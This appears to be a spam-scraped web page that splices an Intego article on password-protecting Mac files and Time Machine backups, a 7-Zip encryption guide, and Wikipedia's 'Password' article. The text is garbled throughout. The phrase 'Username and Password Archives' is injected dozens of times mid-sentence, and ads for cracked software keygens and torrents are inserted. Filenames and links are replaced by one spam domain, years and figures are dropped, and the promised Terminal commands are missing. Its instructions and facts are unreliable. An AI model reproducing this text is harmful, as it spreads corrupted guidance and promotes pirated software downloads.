Password Protecting an Existing PDF through the Print Dialog

You may already have a PDF that you would like to protect with a password. This can also be done using the Preview app. This works for almost any file, image, or document, and from most applications that support the standard macOS print options. This could be an image opened in the Preview app, a website viewed in Safari, or a TextEdit document. Keep in mind that this method will always result in a PDF file so you lose the ability to edit. It is, however, ideal for quickly protecting a file if it has to be sent to someone.

To password protect a file using the Print Dialog, follow these steps:

      1. In the application you are viewing the file with, choose File > Print.
      2. Click the PDF button in the bottom of the dialog, and choose Save as PDF from the popup menu.
      3. Click the Security Options button.
      4. A window displays with more options than you saw above, when exporting to PDF. You can set a password that&#;s required to open the file, but you can also limit someone&#;s ability to copy from and print the document; these must be different from the main password. Click OK, then save the file.

As you can see there are several routes here to the same destination. Your needs may vary slightly, so pick what works for you in that moment.

Password Protecting Pages, Numbers, and Keynote Documents

If you create a new document in Pages, Numbers, or Keynote there is no need to save your document as a PDF. You can password protect the actual document and keep it as an editable file. To password protect your Pages, Numbers or Keynote document, follow these steps:

      1. With your document open, choose File > Set Password.
      2. Enter a password, enter it a second time in the Verify field, then click Set Password.
      3. Another way to password protect your Pages, Numbers, or Keynote file is by using the Share menu. Choose Share > Send a Copy, choose how you want to send the file, then check Require password to open, and enter a password.
      4. A window opens which, among other things, will let you set a password.
      5. You can also select a file type. These options differ slightly depending on the application you&#;re using, and some, but not all of them, will offer a password protection option.

Password Protecting Word, Excel, and PowerPoint Documents

The Office apps &#; Word, Excel, and PowerPoint, allow you to password protect documents. Each of the three apps does this a bit differently.

Microsoft Word

In Microsoft Word, click the Review tab, then click Protect in the ribbon and choose Protect Document. A dialog displays giving you options to password protect a document for opening and modifying the document, as well as other options.

Microsoft Excel

In Excel, you can password protect a spreadsheet by choosing File > Passwords. A small dialog displays, where you can set a password to open the document, and to modify it.

Microsoft PowerPoint

As above with Excel, you choose File > Passwords to protect a PowerPoint presentation. You can set a password to protect a document from opening and another to protect it from modification.

Creating a Password Protected .zip Archive

If, for whatever reason, you cannot password protect the file or folder you want to secure, such as if the file needs to be compatible with another operating system, wrapping files or a folder in a .zip archive can come in handy. Any file, whether it&#;s an image, document or video, can be archived. Size is not an issue, but will depend on what you do with the archive once it&#;s created. You may, for example, have limitations to the size of attachments, if you want to send it by email. However, you can send attachments using MailDrop; see this article for more on MailDrop, and for a number of ways to securely send files.

Creating a password protected archive is convenient if you need to send files quickly and securely, and if the archive needs to be compatible with other operating system. If you send this type of archive to a Windows user, they can open it. If you plan on creating large archives for storage or to transport on a flash drive, I recommend using the above mentioned encrypted disk image instead. Creating a password-protected zip archive is, unfortunately, not as easy as the above mentioned methods; it requires the use of the command line.

To create a password protected .zip archive, follow these steps:

Archiving a Single File

      1. Open the Terminal app which can be found in the Utilities folder inside your Applications folder. When Terminal opens you will see a default string of text like this:

        This is your Mac&#;s name, current directory location (~ is a shortcut for your home folder), and your username. This is called a &#;prompt,&#; and it displays when Terminal is waiting for you to enter a command.

      2. In this example, I have a file on my desktop &#;shoppingdowntown.us&#; that I want to put in a password protected .zip archive. In Terminal, I type the following:
      3. &#;zip -ej &#; (including the space at the end) tells Terminal you want to create a zip archive (zip) with encryption (e) and no file paths included (j). Next, you have to tell it where to save the zip file and what name it must get. The easiest thing is to just use your desktop which can be entered as &#;~/Desktop.&#; When done, it should look like this (add a space after the file extension):
      4. Now Terminal needs to know which file is to be archived. The simplest way to do this is to drag the file you want to encrypt into the Terminal window. This adds the file path to Terminal. The result should look something like this; make sure there&#;s a space between the two file paths, and this example assumes that you&#;ve dragged a file (shoppingdowntown.us) from your Desktop.
      5. Press Enter and Terminal prompts you for a password that will be required to open the .zip file. Terminal will not show any cursor movements while you type the password. Press Enter, and you are asked to verify the password by typing it again. Press Enter a third time and Terminal creates the zip archive. For my example, when Terminal was done, I saw this:
      1. This created &#;shoppingdowntown.us&#; on my desktop. When you double-click the file to open it, you see a password request in Archive Utility, the application that expands archives on macOS.

Archiving a Folder

      1. Open Terminal.
      2. For this example, I have a folder on my Desktop named Photos that I want to put in a password protected .zip file. The command to archive a folder is slightly different:

        As with archiving a single file, zip tells Terminal what kind of archive to create and the (e) in -er tells it to encrypt the file. In this case the (r) means recursive, which tells Terminal to archive all the folder contents, even if they are in sub-folders.

      3. Since we&#;re already pointed at the desktop, specifying the saved file name does not require any path information, In my case I am saving it as &#;shoppingdowntown.us&#; so I end up with (make sure to leave a space at the end):
      4. Add the folder by dragging it onto the Terminal window, and I see this:
      5. After entering and verifying the password I end up with this:

As you can see above, the zip command shows you how much space it&#;s saved for each item in the folder. Since these photos are already compressed, no space is saved, but what&#;s important here is protecting the archive with a password. In other cases, you will save space when performing this operation.

Encrypt Backups

Your Mac may be set up like Fort Knox, but your backups are copied to an external drive or server. If your backups are not encrypted, an unauthorized user doesn&#;t need to go through all the trouble of accessing your Mac; they can just take your backups instead. Luckily, Apple makes it very easy to encrypt Time Machine backups. There are two ways to do this, and I will cover both. In this example, I will walk through the first time setup of Time Machine.

To set up an encrypted Time Machine backup, follow these steps:

How to Back up to an External Drive or External Drive Partition

      1. Open System Preferences, then click the Time Machine icon; click the padlock to make changes if needed, and then click Select Backup Disk.
      2. Select an external drive or partition to use as a backup destination. Make sure to check Encrypt backups.
      3. Set a strong password and a hint. (Choosing a password hint is mandatory.) When you click Use Disk, Time Machine begins the encryption process. A progress bar displays as the drive or partition is prepared, then the backup starts while the encryption runs in the background.
      4. The backup data is stored in a &#;shoppingdowntown.usdb&#; folder that you can open and browse, just as on an unencrypted drive. It correctly assumes that since the drive or partition itself is encrypted there is no need to wrap the backups in an encrypted disk image.

How to Back up to a Server, NAS, or Time Capsule

The process for backing up to a server, such as a NAS or file server, is similar to that of backing up to an external drive drive partition. You can also back up to a Time Capsule, Apple&#;s wi-fi router with a built-in hard disk, that was discontinued in If you are backing up to a NAS, check the documentation for that device to find out how to turn on Time Machine discovery, if this is available. And you can also back up any Mac to another Mac, if file sharing is turned on. See this Apple support document for information about using a network device for Time Machine backups.

Follow these steps to backup your data to a server:

      1. In the Time Machine preferences, and select your server or NAS destination, then click &#;Use Disk.&#;

  • A password request displays: this is the password for your server or NAS.
  • After you authenticate, you are prompted to set a password to encrypt the backup. In this case no hint is required.

 

 

  • The backup will begins momentarily. Because the backup is stored on a network volume it is not stored as a &#;shoppingdowntown.usdb&#; folder but an encrypted sparse bundle image instead. As explained above, this is a type of disk image that expands when more space is needed for additional files.

 

Distributing Files Securely

When you want to send files securely to others &#; friends, family, or colleagues &#; there are many options, and the one you choose depends on the size of the files you want to send, and which software they use. As mentioned above, you can send an encrypted disk image or zip archive by email, using Apple&#;s MailDrop, and not have to worry about the attachment being intercepted, because it&#;s protected by a password.

But there are other ways to send files securely. You can use secure messaging, such as iMessage; you can use online secure file transfer services, such as WeTransfer; you can even use cloud storage, like iCloud, Dropbox, or OneDrive. Because cloud services store files securely, transferring files to others can be as easy as uploading them to your cloud storage service, then sending a link to someone else.

Read our article How to Send Files Securely for more on the various ways to send files securely.

Summing Up

This article has shown you the many ways you can ensure that data and files on your Mac is secure. While this may seem like a lot of work at first, one you set up some of these routines, you&#;ll find that it becomes second nature. Take some time to think about how to secure your files, so you don&#;t have to worry about your data being stolen.

How can I learn more?

Each week on the Intego Mac Podcast, Intego&#;s Mac security experts discuss the latest Apple news, security and privacy stories, and offer practical advice on getting the most out of your Apple devices. Be sure to follow the podcast to make sure you don’t miss any episodes.

You can also subscribe to our e-mail newsletter and keep an eye here on Mac Security Blog for the latest Apple security and privacy news. And don&#;t forget to follow Intego on your favorite social media channels: Facebook, Instagram, Twitter, and YouTube.

About Jay Vrijenhoek

Jay Vrijenhoek is an IT consultant with a passion for Mac security research. View all posts by Jay Vrijenhoek → This entry was posted in How To and tagged Apple, encryption, FileVault, Mac, password security. Bookmark the permalink.
Источник: [shoppingdowntown.us]

Thematic video

Problemas para logar no Mugen Archive?

7-Zip is an open source software used to compress or zip files secured with encryption.

When you send or transfer files that contain Personal Identifiable Information (PII) or other confidential and sensitive data, the files must be encrypted to ensure they are protected from unauthorized disclosure.

7-Zip, like WinZip, creates a container called archive that holds the files to be protected. That archive can be encrypted and protected with a password. 7-Zip is a free software that creates Zip files that can be opened with WinZip or other similar programs.

To obtain a copy of 7-Zip, please see shoppingdowntown.us and select the appropriate Download link.

Once the software is installed, please follow these steps to encrypt a file or folder.

Step 1: Right click on the file / folder to be encrypted.

Step 2: Select “7-Zip” then “Add to archive…”

Add to Archive

 

 

 

 

Step 3: In the Add to Archive window change the name of the archive Username and Password Archives wish to create.

Add name

 

 

Step 4: Change the Archive format to “Zip”.

Add Zip

 

 

 

 

Step 5: Change the Encryption Method to “AES”.

There is a trade-off between using AES and ZipCrypto. AES is proven much more secure than ZipCrypto, but if you select AES the recipient of the zip file may have to install 7-zip or another zip program to read the file contents. Selecting ZipCrypto may allow users to open the zip file in Windows without a zip program, Username and Password Archives, but it does not provide adequate protection against attackers with modern cracking tools.

It is strongly recommended to use AES to protect sensitive and confidential data.

Step 5

 

 

 

 

 

 

 

Step 6: Enter a Password. Use a strong password with at least 8 characters containing upper and lowercase letters, and a minimum of one number.

Enter Password

 

 

 

 

 

 

 

Step 7: Select “Ok” to create the encrypted archive file. The new archive file will be located in the same folder as the original.

**IMPORTANT** &#; Do not share a password via email. Passwords must be shared via out of band. Meaning that you send the file and the password by different communication channels; one on the internet, and one not. The best Advanced Driver Updater 2021 Crack v4.8 Key With Torrent Download is to call the recipient of the Zip file and convey the password over the phone.

Источник: [shoppingdowntown.us]

Password

Used for user authentication to prove identity or access approval

For other uses, see Password (disambiguation).

For assistance with your Wikipedia password, see Help:Reset password.

"Passcode" redirects here. For the Japanese idol group, see Passcode (group).

A password field in a sign in form.

A password, sometimes called a passcode (for example in Apple devices),[1] is secret data, typically a string of characters, usually used to confirm a user's identity.[1] Traditionally, passwords were expected to be memorized, but the large number of password-protected services that a typical individual accesses can make memorization of unique passwords for each service impractical.[2] Using the terminology of the NIST Digital Identity Guidelines,[3] the secret is held by a party called the claimant while the party verifying the identity of the claimant is called the verifier. When the claimant successfully demonstrates knowledge of the password to the verifier through an established authentication protocol,[4] the verifier is able to infer the claimant's identity.

In general, a password is an arbitrary string of characters including letters, digits, or other symbols. If Username and Password Archives permissible characters are constrained to be numeric, the corresponding secret is sometimes called a personal identification number (PIN).

Despite its name, a password does not need to be an actual word; indeed, Username and Password Archives non-word (in the dictionary sense) may be harder to guess, which is a desirable property of passwords. A memorized secret consisting of a sequence of words or other text separated by spaces is sometimes called a passphrase. A passphrase is similar to a password in usage, but the former is generally longer for added security.[5]

History[edit]

Passwords have been used since ancient times. Sentries would challenge those wishing to enter an area to supply a password or watchword, and would only allow a person or group to pass if they knew the password, Username and Password Archives. Polybius describes the system for the distribution of watchwords in the Roman military as follows:

The way in which they secure the passing round of the watchword for the night is as follows: from the tenth maniple of each class of infantry and cavalry, the maniple which is encamped at the lower end of the street, a man is chosen who is relieved from guard duty, and he attends every day at sunset at the tent of the tribune, and receiving from him the watchword—that is a wooden tablet with the word inscribed on it – takes his leave, and on returning to his quarters passes Username and Password Archives the watchword and tablet before witnesses to the commander of the next maniple, who in turn passes it to the one next to him. All do the same until it reaches the first maniples, those encamped near the tents of the tribunes. These latter are obliged to deliver the tablet to the tribunes before dark. So that if all those issued are returned, the tribune knows that the watchword has been given to all the maniples, and has passed through all on its way back to him. If any one of them is missing, he makes inquiry at once, Username and Password Archives, as he knows by the marks from what quarter the tablet has not returned, Username and Password Archives, and whoever is responsible for the stoppage meets with the punishment he merits.[6]

Passwords in military use evolved to include not just a password, Username and Password Archives, but a password and a counterpassword; for example in the opening days of the Battle of Normandy, paratroopers of the U.S. st Airborne Division used a password—flash—which was presented as a challenge, and answered with the correct response—thunder. The challenge and response were changed every three days. American paratroopers also famously used a device known as a "cricket" on D-Day in place of a password system as a temporarily unique method of identification; one metallic click given by the device in lieu of a password was to be met by two clicks in reply.[7]

Passwords have been used with computers since the earliest days of computing. The Compatible Time-Sharing System (CTSS), an operating system introduced at MIT inwas the first computer system to implement password login.[8][9] CTSS had a LOGIN command that requested a user password. "After typing PASSWORD, the system turns off the printing mechanism, if possible, so that the user may type in his password with privacy."[10] In the early s, Robert Morris developed a system of storing login passwords in a hashed form as part of the Unix operating system. The system was based on a simulated Hagelin rotor crypto machine, and first appeared in 6th Edition Unix in A later version of his algorithm, known as crypt(3), used a bit salt and invoked a modified form of the DES algorithm 25 times to reduce the risk of pre-computed dictionary attacks.[11]

In modern times, user names and passwords are commonly used by people during a log in process that controls access to protected computer operating systems, mobile phones, cable TV decoders, automated teller machines (ATMs), etc. A typical computer user has passwords for many purposes: logging into accounts, retrieving e-mail, Username and Password Archives, accessing applications, databases, networks, web sites, and even reading the morning newspaper online.

Choosing a secure and memorable password[edit]

The easier a password is for the owner to remember generally means it will be easier for an attacker to guess.[12] However, Username and Password Archives, passwords that are difficult to remember may also reduce the security of a system because (a) users might need to write down or electronically store the password, (b) users will need frequent password resets and (c) users are more likely to re-use the same password across different accounts. Similarly, the more stringent the password requirements, such as "have a mix of uppercase and lowercase letters and digits" or "change it monthly", the greater the degree to which users will subvert the system.[13] Others argue longer passwords provide more security (e.g., entropy) than shorter passwords with a wide variety of characters.[14]

In The Memorability and Security of Passwords,[15] Jeff Yan et al. examine the effect of advice given to users about a good choice of password, Username and Password Archives. They found that passwords based on thinking of a phrase and taking the first letter of each word are just as memorable as naively selected passwords, and just as hard to crack as randomly generated passwords.

Combining two or more unrelated words and altering some of the letters to special characters or numbers is another good method,[16] but a single dictionary word is not. Having a personally designed algorithm for generating obscure passwords is another good method.[17]

However, asking users to remember a password consisting of a "mix of uppercase and lowercase characters" is similar to asking them to remember a sequence of bits: hard to remember, and only a little bit harder to crack (e.g. only times harder to crack for 7-letter passwords, less if the user simply capitalises one of the letters). Asking users to use "both letters and digits" will often lead to easy-to-guess substitutions such as 'E' → '3' and 'I' → '1', substitutions that are well known to attackers. Similarly typing the password one keyboard row higher is a common trick known to attackers.[18]

InGoogle released a list of the most common password types, all of which are considered insecure because they are too easy to guess (especially after researching an individual on social media):[19]

  • The name of a pet, child, family member, or significant other
  • Anniversary dates and birthdays
  • Birthplace
  • Name of a favorite holiday
  • Something related to a favorite sports team
  • The word "password"

Alternatives to memorization[edit]

Traditional advice to memorize passwords and never write them down has become a challenge because of the sheer number of passwords users of computers and the internet are expected to maintain. One survey concluded that the average user has around passwords.[2] To manage the proliferation of passwords, some users employ the same password for multiple accounts, a dangerous practice since a data breach in one account could compromise the rest. Less risky alternatives include the use of password managers, single sign-on systems and simply keeping paper lists of less critical passwords.[20] Such practices can reduce the number of passwords that must be memorized, such as the password manager's master password, to a more manageable number.

Factors in the security of a password system[edit]

The security of a password-protected system depends on several factors. The overall system must be designed for sound security, with protection against computer viruses, Username and Password Archives, man-in-the-middle Username and Password Archives and the like. Physical security Username and Password Archives are also a concern, from deterring shoulder surfing to more sophisticated physical threats such as video cameras and keyboard sniffers. Passwords should be chosen so that they are hard for an attacker to guess and hard for an attacker to discover using any of the available automatic attack schemes. See password strength and computer security for more information.[21]

Nowadays, it is a common practice for computer systems to hide passwords as they are typed. The purpose of this measure is to prevent bystanders from reading the password; however, some argue that this practice may lead to mistakes and stress, encouraging users to choose weak passwords. As an alternative, users should have the option to show or hide passwords as they type them.[21]

Effective access control provisions may force extreme measures on criminals seeking to acquire a password or biometric token.[22] Less extreme measures include extortion, rubber Username and Password Archives cryptanalysis, and side channel attack.

Some specific password management issues that must be considered when thinking about, choosing, and handling, a password follow.

Rate at which an attacker can try guessed passwords[edit]

The rate at which an attacker can submit guessed passwords to the system is a key factor in determining system security. Some systems impose a time-out of several seconds after a small number (e.g., three) of failed password entry attempts, also known as throttling.[3]:&#;63B Sec &#; In the absence of other vulnerabilities, such systems can be effectively secure with relatively simple passwords if they have been well chosen and are not easily guessed.[23]

Many systems store a cryptographic hash of the password. If an attacker gets access to the file of hashed passwords guessing can be done offline, rapidly testing candidate passwords against the true password's hash value. In the example of a web-server, an online attacker can guess only at the rate at which the server will respond, Username and Password Archives, while an off-line attacker (who gains access to the file) can guess at a rate limited only by the hardware on which the attack is running.

Passwords that are used to generate cryptographic keys (e.g., for disk encryption or Wi-Fi security) can also be Username and Password Archives to high rate guessing. Lists of common passwords are widely available and can make password attacks very efficient. (See Password cracking.) Security in such situations depends on using passwords or passphrases of adequate complexity, making such an attack computationally infeasible for the attacker. Some systems, such as PGP and Wi-Fi WPA, apply a computation-intensive hash to the password to slow such attacks. See key stretching.

Limits on the number of password guesses[edit]

An alternative to limiting the rate at which an attacker can make guesses on a password is to limit the total number of guesses that can be made. The password can be disabled, requiring a reset, after a small number of consecutive bad guesses (say 5); and the user may be required to change the password after a larger cumulative number of bad guesses (say 30), to prevent an attacker from making an arbitrarily large number of bad guesses by interspersing them between good guesses made by the legitimate password owner.[24] Attackers may conversely use knowledge of this mitigation to implement a denial of service attack against the user by intentionally locking the user out of their own device; this denial of service may open other avenues for the attacker to manipulate the situation to their advantage via social engineering.

Form of stored passwords[edit]

Some computer systems store user passwords as plaintext, against which to compare user logon attempts. If an attacker gains access to such an internal password store, all passwords—and so all user accounts—will be compromised. If some users employ the same password for accounts on different systems, those will be compromised as well.

More secure systems store each password in a cryptographically protected form, so access to the actual password will still be difficult for a snooper who gains internal access to the system, while validation of user access attempts remains possible. The most secure don't store passwords at all, but a one-way derivation, such as a polynomial, modulus, or an advanced hash function.[14]Roger Needham invented the now-common approach of storing only a "hashed" form of the plaintext password.[25][26] When a user types in a password on such a system, the password handling software runs through a cryptographic hash algorithm, and if the hash value generated from the user's entry matches the hash stored in the password database, the user is permitted access. The hash value is created by applying a cryptographic hash function to a string consisting of the submitted password and, in many implementations, another value known as a salt. A salt prevents attackers from easily building a list of hash values for common passwords and prevents password cracking efforts from scaling across all users.[27]MD5 and SHA1 are frequently used cryptographic hash functions, but they are not recommended for password hashing unless they are used as part of a larger construction such as in PBKDF2.[28]

The stored data—sometimes called the "password verifier" or the "password hash"—is often stored in Modular Crypt Format or RFC hash format, sometimes in the /etc/passwd file or the /etc/shadow file.[29]

The main storage methods for passwords are plain text, hashed, hashed and salted, and reversibly encrypted.[30] If an attacker gains access to the password file, then if it is stored as plain text, no cracking is necessary. If it is hashed but not salted then it is vulnerable to rainbow table attacks (which are more efficient than cracking). If it is reversibly encrypted then if the attacker gets the decryption key along with the file no cracking is necessary, while if he fails to get the key cracking is not possible. Thus, of the common storage formats for passwords only when passwords have been salted and hashed is cracking both necessary and possible.[30]

If a cryptographic hash function is well designed, it is computationally infeasible to reverse the function to recover a plaintext password. An attacker can, however, use widely available tools to attempt to guess the passwords. These tools work by hashing possible passwords and comparing the result of each guess to the actual password hashes. If the attacker finds a match, they know that their guess is the actual password for the associated user. Password cracking tools can operate by brute force (i.e. trying every possible combination of characters) or by hashing every word from a list; large lists of possible passwords in many languages are widely available on the Internet.[14] The existence of password cracking tools allows attackers to easily recover poorly chosen passwords. In particular, attackers can quickly recover passwords that are short, dictionary words, simple variations on dictionary words, or that use easily guessable patterns.[31] A modified version of the DES algorithm was used as the basis for the password Username and Password Archives algorithm in early Unix systems.[32] The crypt algorithm used a bit salt value so that each user's hash was unique and iterated the DES algorithm 25 times in order to make the hash function slower, both measures intended to frustrate automated guessing attacks.[32] The user's password was used as a key to encrypt a fixed value. More recent Unix or Unix-like systems (e.g., Linux or the various BSD systems) use more secure password hashing algorithms such as PBKDF2, bcrypt, and scrypt, which have large salts and an adjustable cost or number of iterations.[33] A poorly designed hash function can make attacks feasible even if a strong password is chosen. See LM hash for a widely deployed and insecure example.[34]

Methods of verifying a password over a network[edit]

Simple transmission of the password[edit]

Passwords are vulnerable to interception (i.e., "snooping") while being transmitted to the authenticating machine or person. If the password is carried as electrical signals on unsecured physical wiring between the user access point and the central system controlling the password database, Username and Password Archives, it is subject to snooping by wiretapping methods. If it is carried as packeted data over the Internet, anyone able to watch the packets containing the logon information can snoop with a very low probability of detection.

Email is sometimes used to distribute passwords but this is generally an insecure method. Since most email is sent Username and Password Archives plaintext, a message containing a password is readable without effort during transport by any eavesdropper. Further, the message will be stored as plaintext on at least two computers: the sender's and the recipient's. If it passes through intermediate systems during its travels, it will probably be stored on there as well, at least for some time, and may be copied to backup, cache or history files on any of these systems.

Using client-side encryption will only protect transmission from the mail handling system server to the client machine. Previous or subsequent relays of the email will not Username and Password Archives protected and the email will probably be stored on multiple computers, certainly on the originating and receiving computers, most often in clear text.

Transmission through encrypted channels[edit]

The risk of interception of passwords sent over the Internet can be reduced by, among other approaches, using cryptographic protection. The most widely used is the Transport Layer Security (TLS, previously called SSL) feature built into most current Internet browsers. Most browsers alert the user of a TLS/SSL-protected exchange with a server by displaying a closed lock icon, or some other sign, when TLS is in use. There are several other techniques in use; see cryptography.

Hash-based challenge–response methods[edit]

Unfortunately, there is a conflict between stored hashed-passwords and hash-based challenge–response authentication; the latter requires a client to prove to a server that they know what the shared secret (i.e., password) is, and to do this, the server must be able to obtain the shared secret from its stored form. On many systems (including Unix-type systems) doing remote authentication, the shared secret usually becomes the hashed form and has the serious limitation of exposing passwords to offline guessing attacks. In addition, when the hash is used as a shared secret, an attacker does not need the original password to authenticate remotely; they only need the hash.

Zero-knowledge password proofs[edit]

Rather than transmitting a password, or transmitting the hash of the password, password-authenticated key agreement systems can perform a zero-knowledge password proof, which proves knowledge of the password without exposing it.

Moving a step further, augmented systems for password-authenticated key agreement (e.g., AMP, B-SPEKE, PAK-Z, SRP-6) avoid Username and Password Archives the conflict and limitation of hash-based methods. An augmented system allows a client to prove knowledge of the password to a server, where the server knows only a (not exactly) hashed password, and where the unhashed password is required to gain access.

Procedures for changing passwords[edit]

Usually, Username and Password Archives, a system must provide a way to change a password, either because a user believes the current password has been (or might have been) compromised, or as a precautionary measure. If a new password is passed to the system in unencrypted form, security can be lost (e.g., via wiretapping) before the new password can even be installed in the password database and if the new password is given to a compromised employee, little is gained. Some websites include the user-selected password in an unencrypted confirmation e-mail message, with the obvious increased vulnerability.

Identity management systems are increasingly used to automate the issuance of replacements for lost passwords, a feature called self service password reset. Username and Password Archives user's identity is verified by asking questions and comparing the answers to ones previously stored (i.e., when the account was opened).

Some password reset questions ask for personal information that could be found on social media, such as mother's maiden name. As a result, some security experts recommend either making up one's own questions or giving false answers.[35]

Password longevity[edit]

"Password aging" is a feature of some Username and Password Archives systems which forces users to change passwords frequently (e.g., quarterly, monthly or even more often). Such policies usually provoke user protest and foot-dragging at best and hostility at worst. Username and Password Archives is often an increase in the MAD - Global Thermonuclear Warfare crack serial keygen of people who note down the password and leave it where it can easily be found, as well as help desk calls to reset a forgotten password. Users may use simpler passwords or develop variation patterns on a consistent theme to keep their passwords memorable.[36] Because of these issues, Username and Password Archives, there is some debate as to whether password aging is effective.[37] Changing a password will not prevent abuse in most cases, since the abuse would often be immediately noticeable. However, if someone may have had access to the password through some means, such as sharing a computer or breaching a different site, changing the password limits the window for abuse.[38]

Number of users per password[edit]

Allotting separate passwords to each user of a system is preferable to having a single password shared by legitimate users of the system, certainly from a security viewpoint. This is partly because users are more willing to tell another person (who may not be authorized) a shared password than one exclusively for their use.[citation needed] Single passwords are also much less convenient to change because many people need to be told at the same time, and they make removal of a particular user's access more difficult, as for instance on graduation or resignation, Username and Password Archives. Separate logins are also often used for accountability, for example to know who changed a piece of data.

Password security architecture[edit]

Common techniques used to improve the security of computer systems protected by a password include:

  • Not displaying the password on the display Username and Password Archives as it is being entered or obscuring it as it is typed by using asterisks (*) or bullets (•).
  • Allowing passwords of adequate length. (Some legacy operating systems, including early versions[which?] of Unix and Windows, limited passwords to an 8 character maximum,[39][40][41] reducing security.)
  • Requiring users to re-enter their password after a period of inactivity (a semi log-off policy).
  • Enforcing a password policy to increase password strength and security.
    • Assigning randomly chosen passwords.
    • Requiring minimum password lengths.[28]
    • Some systems require characters from various character classes in a password—for example, "must have at least one uppercase and at least one lowercase letter". However, Username and Password Archives, all-lowercase passwords are more secure per keystroke than mixed capitalization passwords.[42]
    • Employ a password blacklist to block the use of weak, easily guessed passwords
    • Providing an alternative Username and Password Archives keyboard entry (e.g., spoken passwords, or biometric identifiers).
    • Requiring more than one authentication system, such as two-factor authentication (something a user has and something the user knows).
  • Using encrypted tunnels or password-authenticated key agreement to prevent access to transmitted passwords via network attacks
  • Limiting the number of allowed failures within a given time period (to prevent repeated password guessing). Você pesquisou por Xbox-Game-Pass the limit is reached, further attempts will fail (including correct password attempts) until the beginning of the next time period. However, this is vulnerable to a form of denial of service attack.
  • Introducing a delay between password submission attempts to slow down automated password guessing programs.

Some of the more stringent policy enforcement measures can pose a risk of alienating users, possibly decreasing security as a result.

Password reuse[edit]

It is common practice amongst computer users to reuse the same password on multiple sites. This presents a substantial security risk, because an attacker needs to only compromise a single site in order to gain access to other sites the victim uses. This problem is exacerbated by also reusing usernames, and by websites requiring email logins, Username and Password Archives, as it makes it easier for an attacker to track a single user across multiple sites, Username and Password Archives. Password reuse can be avoided or minimised by using mnemonic techniques, writing passwords down on paper, or using a password manager.[43]

It has been argued by Redmond researchers Dinei Florencio and Cormac Herley, together with Paul C. van Oorschot of Carleton University, Canada, that password reuse is inevitable, and that users should reuse passwords for low-security websites (which contain little personal data and no financial information, for example) and instead focus their efforts on remembering long, complex passwords for a few important accounts, such as bank accounts.[44] Similar arguments Username and Password Archives made by Forbes in not change passwords as often as many "experts" advise, Username and Password Archives, due to the same limitations in human memory.[36]

Writing down passwords on paper[edit]

Historically, many security experts asked people to memorize their passwords: "Never write down a password". More recently, many security experts such as Bruce Schneier recommend that people use passwords that are too complicated to memorize, write them down on paper, and keep them in a wallet.[45][46][47][48][49][50][51]

Password manager software can also store passwords relatively safely, in an encrypted file sealed with a single master password.

After death[edit]

According to a survey by the University of London, one in ten people are now leaving their passwords in their wills to pass on this important information when they die. One-third of people, according to the poll, agree that their password-protected data is important enough to pass on in their will.[52]

Multi-factor authentication[edit]

Main article: Multi-factor authentication

Multi-factor authentication schemes combine passwords (as "knowledge factors") with one or more other means of authentication, to make authentication more secure and less vulnerable to compromised passwords. For example, a simple two-factor login might send a text message, e-mail, automated phone call, or similar alert whenever a login attempt is made, possibly supplying a code that must be entered in addition to a password.[53] More sophisticated factors include such things as hardware tokens and biometric security.

Password rules[edit]

Further information: Password policy

Most organizations specify a password policy that sets requirements for the composition and usage of passwords, typically dictating minimum length, required categories (e.g., upper and lower case, numbers, and special characters), prohibited elements (e.g., Username and Password Archives, use of one's own name, date of birth, address, telephone number). Some governments have national authentication frameworks[54] that define requirements for user authentication to government services, including requirements for passwords.

Many websites enforce standard rules such as minimum and maximum length, but also frequently include composition rules such as featuring at least one capital letter and at least one number/symbol. These latter, Username and Password Archives, more specific rules were largely based on a report by the National Institute of Standards and Technology (NIST), authored by Bill Burr.[55] It originally proposed the practice of using numbers, obscure characters and capital letters and updating regularly. In a Wall Street Journal article, Burr reported he regrets these proposals and made a mistake when he recommended them.[56]

According to a rewrite of this NIST report, many websites have rules that actually have the opposite effect on the security of their users. This includes complex composition rules as well as forced password changes after certain periods of time. While these rules have long been widespread, they have also long been seen as annoying and ineffective by both users and cyber-security experts.[57] The NIST recommends people use longer phrases as passwords (and advises websites to raise the Username and Password Archives password length) instead of hard-to-remember passwords with "illusory complexity" such as "pA55w+rd".[58] A user prevented from using the password "password" may simply choose "Password1" if required to include a number and uppercase letter. Combined with forced periodic password changes, this Username and Password Archives lead to passwords that are difficult to remember but easy to crack.[55]

Paul Grassi, one of the NIST report's authors, further elaborated: "Everyone knows that an exclamation point is a 1, or an I, or the last character of a password. $ is an S or a 5. If we use these well-known tricks, we aren’t fooling any adversary. We are simply fooling the database that stores passwords into thinking the user did something good."[57]

Pieris Tsokkis and Eliana Stavrou were able to identify some bad password construction strategies through their research and development of a password generator tool. They came up with eight categories of password construction strategies based on exposed password lists, password cracking tools, and online reports citing the most used passwords. These categories include user-related information, keyboard combinations and patterns, placement strategy, word processing, substitution, capitalization, append dates, and a combination of the previous categories[59]

Password cracking[edit]

Main article: Password cracking

Attempting to crack passwords by trying as many possibilities as time and money permit is a brute force attack. A related method, rather more efficient in most cases, is a dictionary attack. In a dictionary attack, all words in one or more dictionaries are tested. Lists of common passwords are also typically tested.

Password strength is the likelihood that a password cannot be guessed or discovered, and varies with the attack algorithm used. Cryptologists and computer scientists often refer to the strength or 'hardness' in terms of entropy.[14]

Passwords easily discovered are termed weak or vulnerable; passwords very difficult or impossible to discover are considered strong. There are several programs available for password attack (or even auditing and recovery by systems personnel) such as L0phtCrack, John the Ripper, and Cain; some of which use password design vulnerabilities (as found in the Microsoft LANManager system) to increase efficiency. These programs are sometimes used by system administrators to detect weak passwords proposed by users.

Studies of production computer systems have consistently shown that a large fraction of all user-chosen passwords are readily guessed automatically. For example, Username and Password Archives, Columbia University found 22% of user passwords could be recovered with little effort.[60] According to Bruce Schneier, examining data from a phishing attack, 55% Username and Password Archives MySpace passwords would be crackable in 8 hours using a commercially available Password Recovery Toolkit capable of testingpasswords per second in [61] He also reported that the single most common password was password1, confirming yet again the general lack of informed care in choosing passwords among users. (He nevertheless maintained, based on these data, that the general quality of passwords has improved over the years—for example, average length was up to eight characters from under seven in previous surveys, and less than 4% were dictionary words.[62])

Incidents[edit]

  • On July 16,CERT reported an incident where an attacker had foundencrypted passwords. At the time the attacker was discovered, 47, passwords had already been cracked.[63]
  • In September,after the deaths of New York employees in the September 11 attacks, financial services firm Cantor Fitzgerald through Microsoft broke the passwords of deceased employees to gain access to files needed for servicing client accounts.[64] Technicians used brute-force attacks, and interviewers contacted families to gather personalized information that might reduce the search time for weaker passwords.[64]
